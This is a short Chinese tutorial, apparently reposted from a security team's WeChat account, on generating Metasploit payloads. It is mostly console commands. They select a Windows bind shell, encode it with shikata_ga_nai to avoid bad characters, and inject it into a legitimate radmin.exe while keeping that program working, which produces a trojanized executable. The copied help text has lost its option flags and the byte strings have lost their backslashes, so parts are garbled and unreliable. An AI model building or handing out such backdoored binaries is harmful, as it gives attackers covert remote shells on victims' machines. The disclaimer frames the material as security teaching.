metasploit framework——payload
前言
使用exploit是为了将payload在目标机上执行
1、payload使用
msfconsole
msfconsole
msf > show payloads #查看可用payload
msf > use payload/windows/shell_bind_tcp #这是个绑定端口shell
msf payload(windows/shell/bind_tcp) > show options #查看设置
msf payload(windows/shell/bind_tcp) > generate #获得shellcode,是ruby语言写的
msf payload(windows/shell/bind_tcp) > generate -h
Usage: generate [options]
Generates a payload.
OPTIONS:
强制编码。
<opt> 要避免的字符列表:' x00 xff'
<opt> 要使用的编码器模块的名称。
<opt> 输出文件名(否则为stdout)
帮助横幅。
<opt> 编码迭代的次数。
保持模板可执行的功能
<opt> 以VAR = VAL格式逗号分隔的选项列表。
<opt> 输出平台
<opt> NOP sled length.
<opt> 输出格式: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
<opt> 要使用的可执行模板
#绕过坏字符
msf payload(windows/shell/bind_tcp) > generate -b 'x00'
msf payload(windows/shell/bind_tcp) > generate -b 'x00x44x67x66xfax01xe0x44x67xa1xa2xa3x75x4b' #generate会自动选择最合适的
#如果要排除的坏字符太多,可能就没有合适的shellcode了
#手动指定编码模块
msf payload(windows/shell/bind_tcp) > show encoders
#注入文件
msf payload(windows/shell/bind_tcp) > generate -b 'x00' -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f /root/1.exe
结语
熟悉payload
红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。其核心团队于2022年转型于信息安全研究院,并为政企提供安全服务与技术支持。
© Honker Security Commando
原文始发于微信公众号(中龙 红客突击队):metasploit framework——payload
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论